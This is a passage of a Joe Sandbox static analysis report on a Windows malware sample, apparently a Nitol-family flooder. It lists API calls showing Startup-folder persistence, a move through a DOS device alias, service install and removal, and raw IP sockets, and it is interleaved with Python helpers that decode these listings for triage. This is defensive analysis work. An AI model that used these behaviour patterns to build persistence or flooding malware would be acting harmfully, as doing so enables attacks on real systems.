                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 100084A8
                                                                    • strstr.MSVCRT ref: 100084BC
                                                                    • strstr.MSVCRT ref: 100084D0
                                                                    • lstrcatA.KERNEL32(?,10012C44), ref: 100084EA
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 100084F6
                                                                    • lstrcpyA.KERNEL32(00000000,00000000), ref: 100084FE
                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,00000000), ref: 10008537
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$CloseOpenQueryValuelstrcatstrstr$CreateProcesslstrcpystrrchrwsprintf
                                                                    • String ID: "%1$%s\shell\open\command$D
                                                                    • API String ID: 742877492-1634606264
                                                                    • Opcode ID: 99e288cdf052f4f19229a7209b4027f9264ad67bd1c5e31c10d1caa20681c233
                                                                    • Instruction ID: 1601d28fbc1829684837d70fe9aeed38dff592e81ea228818451e7e84f789ac0
                                                                    • Opcode Fuzzy Hash: 99e288cdf052f4f19229a7209b4027f9264ad67bd1c5e31c10d1caa20681c233
                                                                    • Instruction Fuzzy Hash: 67412DB290016CBAEB11DB90CC89EEF7B7CEB48785F1400A5F605E6054D735AB99CBA0
                                                                    APIs
                                                                    • RegisterServiceCtrlHandlerA.ADVAPI32(Rsjshd fzfgkqcm,1000918B), ref: 1000908B
                                                                    • SetServiceStatus.ADVAPI32(00000000,100156A0), ref: 100090DB
                                                                    • Sleep.KERNEL32(000001F4), ref: 100090E9
                                                                    • GetVersionExA.KERNEL32(?), ref: 10009100
                                                                    • SetServiceStatus.ADVAPI32(100156A0), ref: 10009120
                                                                      • Part of subcall function 10008E92: WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,75A78400,100098BA), ref: 10008EAD
                                                                      • Part of subcall function 10008E92: CloseHandle.KERNEL32(00000000,?,?,?,?,?,75A78400,100098BA), ref: 10008EB4
                                                                    • Sleep.KERNEL32(0000003C), ref: 10009129
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1000913F
                                                                    • wsprintfA.USER32 ref: 10009158
                                                                    • CloseHandle.KERNEL32(00000000), ref: 1000916E
                                                                    • SetServiceStatus.ADVAPI32(100156A0), ref: 10009181
                                                                    • exit.MSVCRT ref: 10009185
                                                                    • SetServiceStatus.ADVAPI32(100156A0,100156A0,750904E0,00000001), ref: 100091C8
                                                                    • Sleep.KERNEL32(000001F4), ref: 100091CF
                                                                    • SetServiceStatus.ADVAPI32(100156A0), ref: 100091E9
                                                                    • SetServiceStatus.ADVAPI32(100156A0,100156A0,750904E0,00000001), ref: 1000920C
                                                                    • Sleep.KERNEL32(000001F4), ref: 10009213
                                                                    • SetServiceStatus.ADVAPI32(100156A0,100156A0,750904E0,00000001), ref: 10009247
                                                                    • Sleep.KERNEL32(000001F4), ref: 1000924E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Service$Status$Sleep$CloseHandle$CtrlFileHandlerModuleNameObjectRegisterSingleVersionWaitexitwsprintf
                                                                    • String ID: %s Win7$Rsjshd fzfgkqcm
                                                                    • API String ID: 617891212-61262810
                                                                    • Opcode ID: 737f2e6e8c10537c1ee20303616d61b8bd7260fdd04b5b1d61250eaab3d21468
                                                                    • Instruction ID: 29179e968a3b72ecd081788843c22f13cd714ac3f9978304fd6e047acabf0a54
                                                                    • Opcode Fuzzy Hash: 737f2e6e8c10537c1ee20303616d61b8bd7260fdd04b5b1d61250eaab3d21468
                                                                    • Instruction Fuzzy Hash: 58412E71505329EFF7109F50CD8CF967AB9EB1139BF888059E208AF1A4C7B69944CFA0
                                                                    APIs
                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 00411411
                                                                    • ??2@YAPAXI@Z.MSVCRT(00100000), ref: 0041141D
                                                                    • ??2@YAPAXI@Z.MSVCRT(00100000), ref: 0041143B
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00411453
                                                                    • strrchr.MSVCRT ref: 00411462
                                                                    • DefineDosDeviceA.KERNEL32(00000001,?,?), ref: 004114A6
                                                                    • Sleep.KERNEL32(00000064), ref: 004114AE
                                                                    • MoveFileExA.KERNEL32(?,\\.\killmdx,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004114FC
                                                                    • SetFileAttributesA.KERNEL32(?,00000002), ref: 0041150B
                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 00411515
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 0041151E
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00411526
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$??2@??3@$AttributesCreateDefineDeviceDirectoryFolderModuleMoveNamePathSleepSpecialstrrchr
                                                                    • String ID: \\.\killmdx$d$i$k$l$l$m$x
                                                                    • API String ID: 2050045017-181802781
                                                                    • Opcode ID: c8a5b0d99c3c016a99753ecf6730700b41eb22e41fc6f651bde787629d062554
                                                                    • Instruction ID: a9088f504c7827f249a5632afeb7e39411e64d0ceace578ddab12e178ae7cd40
                                                                    • Opcode Fuzzy Hash: c8a5b0d99c3c016a99753ecf6730700b41eb22e41fc6f651bde787629d062554
                                                                    • Instruction Fuzzy Hash: 19416A7180439CFEFB02D7E4CC89FDEBFB99B16304F044099E244A6192D6BA56598B61
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(ADVAPI32.dll,?,SeShutdownPrivilege,?,?,1000521F,SeShutdownPrivilege,00000001,?,10005F99,?), ref: 1000A286
                                                                    • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 1000A296
                                                                    • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 1000A2A1
                                                                    • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 1000A2AC
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,1000521F,SeShutdownPrivilege,00000001,?,10005F99,?), ref: 1000A2B6
                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 1000A2C1
                                                                    • LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 1000A309
                                                                    • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 1000A311
                                                                    • CloseHandle.KERNEL32(?), ref: 1000A320
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 1000A331
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 1000A33C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressLibraryProc$Load$Free$CloseHandle
                                                                    • String ID: ADVAPI32.dll$AdjustTokenPrivileges$GetCurrentProcess$GetLastError$KERNEL32.dll$LookupPrivilegeValueA$OpenProcessToken$SeShutdownPrivilege$kernel32.dll
                                                                    • API String ID: 2887716753-2040270271
                                                                    • Opcode ID: eb94e49701d1cf1157ef0584d2a22ceb1825a5a0700ea7574f152509f5e18a49
                                                                    • Instruction ID: d0f0468780b017e01151438bf255353ba3d663cc7183264dfe9b1facf1a7b364
                                                                    • Opcode Fuzzy Hash: eb94e49701d1cf1157ef0584d2a22ceb1825a5a0700ea7574f152509f5e18a49
                                                                    • Instruction Fuzzy Hash: 75211B71D0021DBAEB119BF5CC48FEEBFB8EF58241F014555F601E6150DB749A84CBA0
                                                                    APIs
                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10005E95
                                                                    • OpenServiceA.ADVAPI32(00000000,Rsjshd fzfgkqcm,000F01FF), ref: 10005EA6
                                                                    • DeleteService.ADVAPI32(00000000), ref: 10005EAD
                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10005EBF
                                                                    • lstrcatA.KERNEL32(?,?), ref: 10005F04
                                                                    • DeleteFileA.KERNEL32(?), ref: 10005F11
                                                                    • exit.MSVCRT ref: 10005F19
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DeleteOpenService$DirectoryFileManagerSystemexitlstrcat
                                                                    • String ID: .$D$Rsjshd fzfgkqcm$\$a$e$e$f$k$l$t$u$y
                                                                    • API String ID: 3392600227-1081949225
                                                                    • Opcode ID: 28d876264f97ccfa2923b9d42dad7beb551e81a6745ba88f4992f0cb51909809
                                                                    • Instruction ID: c22a01dc393668847851f56136fa3f06600cf10012881ae33b39abbd7e87e008
                                                                    • Opcode Fuzzy Hash: 28d876264f97ccfa2923b9d42dad7beb551e81a6745ba88f4992f0cb51909809
                                                                    • Instruction Fuzzy Hash: 4B110D7080839CEAFB0197E4CC4DBCDBFA95B11749F0880C4E284AA192C6BA5259C736
                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0040E6F4
                                                                    • memcpy.MSVCRT(00000000,?,?), ref: 0040E707
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocVirtualmemcpy
                                                                    • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Run$rsion\Run
                                                                    • API String ID: 1674066667-974480386
                                                                    • Opcode ID: 40cb11ceb4754c1a5c56e879a2c8a437530fdfdeb05461a0697ad488427a9bc8
                                                                    • Instruction ID: b9a89324056626b0d0c0932be2554eebe4d1a00b522bd0b1e42a54e6f02ee4b4
                                                                    • Opcode Fuzzy Hash: 40cb11ceb4754c1a5c56e879a2c8a437530fdfdeb05461a0697ad488427a9bc8
                                                                    • Instruction Fuzzy Hash: 9202B771D00258EEEF219BA58C49FEE7B7DEB05308F0404EAF14876191D67A4EA4CF66
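The per-function API listings on this page are raw sandbox output, and the interesting facts are buried in hex arguments: `SHGetSpecialFolderPathA(...,00000007,...)` is a lookup of the Startup folder (CSIDL_STARTUP), `DefineDosDeviceA(00000001,...)` followed by `MoveFileExA(?,\\.\killmdx,MOVEFILE_REPLACE_EXISTING)` moves the payload through a freshly defined DOS device alias, `RegOpenKeyExA(80000000,...)` plus `CreateProcessA` resolves an HKEY_CLASSES_ROOT `shell\open\command` handler and launches it, `OpenServiceA`/`DeleteService` is the uninstall path, and `WSASocketA(00000002,00000003,000000FF,...)` in the function below opens an AF_INET/SOCK_RAW/IPPROTO_RAW socket. The following Python helper is an added example, not part of the Joe Sandbox report or of the sample: it parses lines in exactly the `Func.MODULE(args), ref: ADDR` format used here, decodes the Win32 constants that matter for triage (falling back to hex for anything outside its small tables), and reports those behaviours. The sample input is constructed from lines copied from this page; the service name `Rsjshd fzfgkqcm` it contains looks generated and should be treated as a weak, possibly per-build indicator.

```python
"""Added example: triage helper for Joe Sandbox per-function API listings.

Accepts lines such as
    • Func.MODULE(arg,arg,...), ref: ADDR
    • Func.MODULE ref: ADDR
decodes selected Win32 constants and flags triage-relevant behaviours.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: API lines copied from the function blocks on this page.
SAMPLE_REPORT = r"""
• SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 00411411
• DefineDosDeviceA.KERNEL32(00000001,?,?), ref: 004114A6
• MoveFileExA.KERNEL32(?,\\.\killmdx,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004114FC
• SetFileAttributesA.KERNEL32(?,00000002), ref: 0041150B
• RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,00000000), ref: 100083FA
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,00000000), ref: 10008537
• OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10005E95
• OpenServiceA.ADVAPI32(00000000,Rsjshd fzfgkqcm,000F01FF), ref: 10005EA6
• DeleteService.ADVAPI32(00000000), ref: 10005EAD
• WSASocketA.WS2_32(00000002,00000003,000000FF,00000000,00000000,00000001), ref: 0040A227
• memset.MSVCRT ref: 100083CF
  • Part of subcall function 10008E92: CloseHandle.KERNEL32(00000000,?,?,?,?,?,75A78400,100098BA), ref: 10008EB4
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<func>[^\s.(]+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s+ref:\s*(?P<addr>[0-9A-Fa-f]+)"
)
# 8 hex digits, optionally followed by the report's own "(FLAG_NAME)" annotation.
HEX_ARG_RE = re.compile(r"^([0-9A-Fa-f]{8})(?:\(.*\))?$")


def lookup(table):
    """Decoder mapping an integer argument to a constant name, hex if unknown."""
    return lambda v: table.get(v, hex(v))


HKEYS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
CSIDL = {0x0007: "CSIDL_STARTUP", 0x001A: "CSIDL_APPDATA",
         0x0024: "CSIDL_WINDOWS", 0x0025: "CSIDL_SYSTEM"}

# function name -> {argument index: decoder}; only arguments that matter for triage
DECODERS = {
    "RegOpenKeyExA": {0: lookup(HKEYS), 3: lookup({0xF003F: "KEY_ALL_ACCESS", 0x20019: "KEY_READ"})},
    "SHGetSpecialFolderPathA": {2: lookup(CSIDL)},
    "WSASocketA": {0: lookup({2: "AF_INET", 23: "AF_INET6"}),
                   1: lookup({1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}),
                   2: lookup({6: "IPPROTO_TCP", 17: "IPPROTO_UDP", 255: "IPPROTO_RAW"})},
    "DefineDosDeviceA": {0: lookup({1: "DDD_RAW_TARGET_PATH"})},
    "MoveFileExA": {2: lookup({1: "MOVEFILE_REPLACE_EXISTING"})},
    "SetFileAttributesA": {1: lookup({2: "FILE_ATTRIBUTE_HIDDEN"})},
    "OpenSCManagerA": {2: lookup({2: "SC_MANAGER_CREATE_SERVICE", 0xF003F: "SC_MANAGER_ALL_ACCESS"})},
    "OpenServiceA": {2: lookup({0xF01FF: "SERVICE_ALL_ACCESS"})},
}


@dataclass
class Call:
    func: str
    module: str
    addr: int
    args: list                  # int for 8-digit hex literals, None for "?", str otherwise
    decoded: dict = field(default_factory=dict)


def parse_arg(tok):
    tok = tok.strip()
    if tok == "?":
        return None
    m = HEX_ARG_RE.match(tok)
    return int(m.group(1), 16) if m else tok


def parse_calls(text):
    """Turn report lines into Call objects with decoded constants attached."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [parse_arg(t) for t in raw.split(",")] if raw else []
        call = Call(m.group("func"), m.group("mod"), int(m.group("addr"), 16), args)
        for idx, dec in DECODERS.get(call.func, {}).items():
            if idx < len(args) and isinstance(args[idx], int):
                call.decoded[idx] = dec(args[idx])
        calls.append(call)
    return calls


def behaviours(calls):
    """Observations an analyst would note from the decoded call sequence."""
    def has(func, pred=lambda c: True):
        return any(c.func == func and pred(c) for c in calls)

    found = []
    if has("WSASocketA", lambda c: c.decoded.get(1) == "SOCK_RAW"):
        found.append("raw socket (SOCK_RAW): hand-built IP packets, consistent with a flooder")
    if has("DefineDosDeviceA", lambda c: c.decoded.get(0) == "DDD_RAW_TARGET_PATH") and \
       has("MoveFileExA", lambda c: len(c.args) > 1 and isinstance(c.args[1], str)
           and c.args[1].startswith("\\\\.\\")):
        found.append("file moved through a freshly defined DOS device alias (\\\\.\\name)")
    if has("SHGetSpecialFolderPathA", lambda c: c.decoded.get(2) == "CSIDL_STARTUP"):
        found.append("resolves the Startup folder: persistence location")
    if has("RegOpenKeyExA", lambda c: c.decoded.get(0) == "HKEY_CLASSES_ROOT") and has("CreateProcessA"):
        found.append("reads an HKCR handler then CreateProcessA: launches the registered handler")
    if has("OpenServiceA") and has("DeleteService"):
        found.append("opens and deletes a service: self-uninstall path")
    return found


if __name__ == "__main__":
    parsed = parse_calls(SAMPLE_REPORT)
    for c in parsed:
        print(f"{c.addr:08X} {c.func}.{c.module} {c.decoded}")
    print(*behaviours(parsed), sep="\n")
```

The decoders deliberately key on argument position, because the report prints arguments positionally and leaves unknown values as `?`; a `?` is skipped rather than guessed, so a behaviour is only flagged when the decoded constant is actually present in the listing.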
APIs
• WSASocketA.WS2_32(00000002,00000003,000000FF,00000000,00000000,00000001), ref: 0040A227
• inet_addr.WS2_32(192.168.1.224), ref: 0040A29B
• htonl.WS2_32(00000001), ref: 0040A2DC
• wsprintfA.USER32 ref: 0040A364
Strings
Memory Dump Source
• Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: Sockethtonlinet_addrwsprintf
• String ID: 192.168.1.224$@$E$P
• API String ID: 462099796-3350482742
• Opcode ID: 56a9e7ece5f23a2d033e319e9e94635acb01b86b1ff5b11e95adcf17887bad1d
• Instruction ID: 8d4450c782e8bac2708a001330a19cf2d6d5422db61af4f64f48f07eceae4d4a
• Opcode Fuzzy Hash: 56a9e7ece5f23a2d033e319e9e94635acb01b86b1ff5b11e95adcf17887bad1d
• Instruction Fuzzy Hash: 0E816F71C5038CA9EB11DBE4CC45BEEBBBCAF09304F00506AE504FB292D7B84645CB6A
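The APIs list above is how Joe Sandbox prints every call it resolves statically: API.MODULE(args), ref: address, with 8-hex-digit literals, a question mark for values the pass could not resolve, string literals shown verbatim, and "Part of subcall function" lines that belong to a callee. Added example, not part of this report or of the sample: a Python parser for those lines plus a decoder for the WSASocketA triple, so that 00000002,00000003,000000FF at 0040A227 reads as AF_INET, SOCK_RAW, IPPROTO_RAW, i.e. a raw IP socket on which the caller supplies its own packet headers. SAMPLE_LINES are copied from this record and from the setsockopt subcall line of the next one; the Winsock constant tables are taken from the Windows SDK headers.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Union

# Added example: parser for Joe Sandbox "APIs" lines. One call per line, e.g.
#   • WSASocketA.WS2_32(00000002,00000003,000000FF,00000000,00000000,00000001), ref: 0040A227
#   • wsprintfA.USER32 ref: 0040A364                         (no argument list at all)
#   • Part of subcall function 00409E60: setsockopt.WS2_32(?,0000FFFF,...), ref: 00409E85
# Arguments: 8-hex-digit literal -> int, '?' -> None (unresolved), anything else -> str.
Arg = Union[int, str, None]

LINE_RE = re.compile(
    r"^\s*\u2022?\s*(?:Part of subcall function\s+(?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[^.\s(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]
    ref: int                      # address of the call site
    caller: Optional[int] = None  # set for "Part of subcall function" lines


def _parse_arg(tok: str) -> Arg:
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok  # string literal; keep spaces, the report prints them verbatim


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [_parse_arg(t) for t in raw.split(",")] if raw else []
    caller = m.group("caller")
    return ApiCall(m.group("api"), m.group("module"), args,
                   int(m.group("ref"), 16), int(caller, 16) if caller else None)


def parse_api_lines(lines) -> List[ApiCall]:
    return [c for c in map(parse_api_line, lines) if c is not None]


# Winsock constants from the Windows SDK, enough to name what this sample passes.
AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
IPPROTO = {0: "IPPROTO_IP", 1: "IPPROTO_ICMP", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP", 255: "IPPROTO_RAW"}


def _name(table: dict, value: Arg) -> str:
    if value is None:
        return "?"
    return table.get(value, hex(value) if isinstance(value, int) else str(value))


def decode_wsasocket(call: ApiCall) -> dict:
    """Name the af/type/protocol triple of a socket-creation call."""
    if call.api not in ("WSASocketA", "WSASocketW", "socket") or len(call.args) < 3:
        raise ValueError("not a socket-creation call: %s" % call.api)
    af, typ, proto = call.args[:3]
    return {"family": _name(AF, af), "type": _name(SOCK_TYPE, typ), "protocol": _name(IPPROTO, proto)}


# Copied from the report records above (constructed input for the example).
SAMPLE_LINES = [
    "\u2022 WSASocketA.WS2_32(00000002,00000003,000000FF,00000000,00000000,00000001), ref: 0040A227",
    "\u2022 inet_addr.WS2_32(192.168.1.224), ref: 0040A29B",
    "\u2022 htonl.WS2_32(00000001), ref: 0040A2DC",
    "\u2022 wsprintfA.USER32 ref: 0040A364",
    "  \u2022 Part of subcall function 00409E60: setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 00409E85",
]

if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_LINES)
    for c in calls:
        print(c)
    print(decode_wsasocket(calls[0]))
```

A raw socket with IPPROTO_RAW is the usual base for flooders that hand-build IP headers, which is consistent with the Nitol detection in the overview. In the setsockopt subcall line that the parser also handles, 0000FFFF is SOL_SOCKET and 00000080 is SO_LINGER with a 4-byte linger structure.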
APIs
• __EH_prolog.LIBCMT ref: 00410C2B
• wsprintfA.USER32 ref: 00410C5C
• CreateMutexA.KERNEL32(00000000,00000000,?), ref: 00410C70
• GetLastError.KERNEL32 ref: 00410C7C
• ReleaseMutex.KERNEL32(00000000), ref: 00410C8A
• CloseHandle.KERNEL32(00000000), ref: 00410C91
• exit.MSVCRT ref: 00410C98
  • Part of subcall function 00409E60: setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 00409E85
  • Part of subcall function 00409E60: CancelIo.KERNEL32(?,?,?,?,00409A9F), ref: 00409E8E
  • Part of subcall function 00409E60: InterlockedExchange.KERNEL32(?,00000000), ref: 00409E9A
  • Part of subcall function 00409E60: closesocket.WS2_32(?), ref: 00409EA3
  • Part of subcall function 00409E60: SetEvent.KERNEL32(?,?,?,?,00409A9F), ref: 00409EAC
  • Part of subcall function 0040DD10: TerminateThread.KERNEL32(?,000000FF,?,?,?,0040DCFC), ref: 0040DD2C
  • Part of subcall function 0040DD10: CloseHandle.KERNEL32(?,?,?,?,0040DCFC), ref: 0040DD34
• strstr.MSVCRT ref: 00410D4D
• strncpy.MSVCRT ref: 00410D6C
• _mbscpy.MSVCRT(00000000,?), ref: 00410D82
• lstrcat.KERNEL32(?,?), ref: 00410D98
• atoi.MSVCRT(?), ref: 00410DA5
• lstrcat.KERNEL32(00000000,10012DDC), ref: 00410DC7
• strcmp.MSVCRT ref: 00410DD9
• GetTickCount.KERNEL32 ref: 00410DE8
• GetTickCount.KERNEL32 ref: 00410E0B
• WaitForSingleObject.KERNEL32(00000064,00000064), ref: 00410E7A
• Sleep.KERNEL32(000001F4), ref: 00410E87
Strings
Memory Dump Source
• Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: CloseCountHandleMutexTicklstrcat$CancelCreateErrorEventExchangeH_prologInterlockedLastObjectReleaseSingleSleepTerminateThreadWait_mbscpyatoiclosesocketexitsetsockoptstrcmpstrncpystrstrwsprintf
• String ID: Rsjshd fzfgkqcm
• API String ID: 553554239-3753134293
